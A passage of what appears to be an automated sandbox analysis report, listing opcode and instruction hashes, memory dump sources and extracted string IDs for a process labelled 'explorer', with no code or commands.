                                  • Opcode Fuzzy Hash: 0b40d3a1063969bf6079420ddfc8f27475a92ddc4ed172d76bd0f9f93fc268d2
                                  • Instruction Fuzzy Hash: 9841A230E5E64E4FEB61EB7888696F97BE1EF59300F0645B7D408C70B1EE78A6448B11
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8024bd49ffbb4e08d68fb3f14a5beabb3bf07bcf7afd8f5b27ef511fcb10a43d
                                  • Instruction ID: aa3ecff35381adac2a236109e751b02e8685725efc657de6a02fd439bffbe29f
                                  • Opcode Fuzzy Hash: 8024bd49ffbb4e08d68fb3f14a5beabb3bf07bcf7afd8f5b27ef511fcb10a43d
                                  • Instruction Fuzzy Hash: 9F413C35B0935A4FD315FB7CD8A49E83B60EF95326B0946F7D188CE0E7CA28A449C751
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c3ec1eeb8d982876ea0e964d1b9140d2b02a4ae2dc95677243d810a500f174f9
                                  • Instruction ID: 9dce94c4ee05649dd4a1bc50478d2378377af1a94772d10f4c94f37c726c4ea8
                                  • Opcode Fuzzy Hash: c3ec1eeb8d982876ea0e964d1b9140d2b02a4ae2dc95677243d810a500f174f9
                                  • Instruction Fuzzy Hash: EA41EB30A0AA4E4FEBA9DF6884752B9B7E0FF19304F11447ED42DC61E2DE75A544CB41
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 457ef2d97c1038186ec1f909fde355d67a60fdbfefec1cd40c86248e50adfbea
                                  • Instruction ID: 7a0901aae7e2fdb536ef91f672460fe33f48c2a59d69e39f3ab6a0e389ffcd6d
                                  • Opcode Fuzzy Hash: 457ef2d97c1038186ec1f909fde355d67a60fdbfefec1cd40c86248e50adfbea
                                  • Instruction Fuzzy Hash: 44312730E0E68E4FEBA9AB6884346B97BE1FF66304F01057ED41EC71E2DEA86544C750
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4579d38133c419e31270ef2bd06245a69b581637fd736b4c2c37b2c93d5872c3
                                  • Instruction ID: aa73b5e0390ef2d3402ada897d66d2eacb48ce9586718b61f103167b87fe6e23
                                  • Opcode Fuzzy Hash: 4579d38133c419e31270ef2bd06245a69b581637fd736b4c2c37b2c93d5872c3
                                  • Instruction Fuzzy Hash: F831E531E0964E4FEB95EB68C4246FD77E2FF6A310F05017AD019D71E2DEA5A904C790
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 754c00bf2409ce1d7c2b90c4810ae1ad9e7ead420838b53167b3156ec7b16322
                                  • Instruction ID: ac8a5fa0c0f319c54c49c7f817ab160ca1fc5fe265adb2661148d4483f79f1f0
                                  • Opcode Fuzzy Hash: 754c00bf2409ce1d7c2b90c4810ae1ad9e7ead420838b53167b3156ec7b16322
                                  • Instruction Fuzzy Hash: E931D735E0F74E8BF774ABE085312F8B6A2FF46300F42117AD45D960E2DEA86A54C761
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8564d350a74877e5f9f7eb1e25fe65bc6d31db9b5f3fcbb470598dd75fb015b
                                  • Instruction ID: 949c93107caca2cd4ec17c9e7faf1cd5a91b987e56f3214e9f8cc2b648546d23
                                  • Opcode Fuzzy Hash: d8564d350a74877e5f9f7eb1e25fe65bc6d31db9b5f3fcbb470598dd75fb015b
                                  • Instruction Fuzzy Hash: 83310531A0E78D8FDB659F2488651F97FA1FF66304F4501BED808C70E2DAB9A618C741
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6098a332cac628e231b97dce8284d3a6702471101f63e85ed316be6e15ae1fba
                                  • Instruction ID: 755f24784b7d2b77c4f182a840245dc9633537eee4ac40146a5942d034010dec
                                  • Opcode Fuzzy Hash: 6098a332cac628e231b97dce8284d3a6702471101f63e85ed316be6e15ae1fba
                                  • Instruction Fuzzy Hash: F541CC70A0E38E8FE7619BF489253F97BE1AF05300F054576D408D61E2EBB8A758C751
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84e92cc9657dc69533e357d4ca42472fad2b1a4d7aa269c81b56406e87f51f05
                                  • Instruction ID: 73927ed23742f73d26f4426617601eb1e2c642b63a3198bb7dcbe4ee10d80375
                                  • Opcode Fuzzy Hash: 84e92cc9657dc69533e357d4ca42472fad2b1a4d7aa269c81b56406e87f51f05
                                  • Instruction Fuzzy Hash: A931B53091E38E8FDB669F7489641A57FB0FF16200F0644BBE848C60E2E678E664CB11
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca39a5056b827c4ce39c1473e08da2e6f08371edfcbe3ccc935e6e444a6b35fb
                                  • Instruction ID: a579f6471563c9e9028690b8e547ddaca3180a5bd3089f00ae2d7bb91861ea46
                                  • Opcode Fuzzy Hash: ca39a5056b827c4ce39c1473e08da2e6f08371edfcbe3ccc935e6e444a6b35fb
                                  • Instruction Fuzzy Hash: 5E312531A0E38A4FE716AB7898754F97FB0EF16329B0501FBE459CA0E3DA386444C751
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 339deb279b26465b12d10da2e9c71692d6dc447f484606a3cc9bc1d2fb81c552
                                  • Instruction ID: 5001e1d9fd37df29a8113954feb363ab6a2a1b563af9cb226b730dea40b73ce6
                                  • Opcode Fuzzy Hash: 339deb279b26465b12d10da2e9c71692d6dc447f484606a3cc9bc1d2fb81c552
                                  • Instruction Fuzzy Hash: E431BB74F1991D9FEBA4EB98C8A56BCB7F6FF58300F51013AD00DE3292DE6869418B50
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ffa839e125c9e25a6acd7aebb23bf8819e3e6e7fbaeb7cb53c59f3027be145d
                                  • Instruction ID: 457c97b81d753c503249a07516abbf6b5935daf3f4235dad49a13b9c17dd622a
                                  • Opcode Fuzzy Hash: 7ffa839e125c9e25a6acd7aebb23bf8819e3e6e7fbaeb7cb53c59f3027be145d
                                  • Instruction Fuzzy Hash: 7131A230E0E64E8EEB60EBA4C8246FD7BE1AF55304F41457AD409D61E2DFB86A048B61
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Strings
                                  • String ID: '$*$:$J$\$]$`$i
                                  • API String ID: 0-586176889
                                  • String ID: "$'$*$J$\$]
                                  • API String ID: 0-588965342
                                  • String ID: ,$6$B$L
                                  • API String ID: 0-1653800205
                                  • String ID: $+$[${
                                  • API String ID: 0-24842237
                                  • String ID: 1$X$\${
                                  • API String ID: 0-2079265821
                                  • String ID: :$`$a$i
                                  • API String ID: 0-934523947
                                  • String ID: 9$d$j${
                                  • API String ID: 0-204969695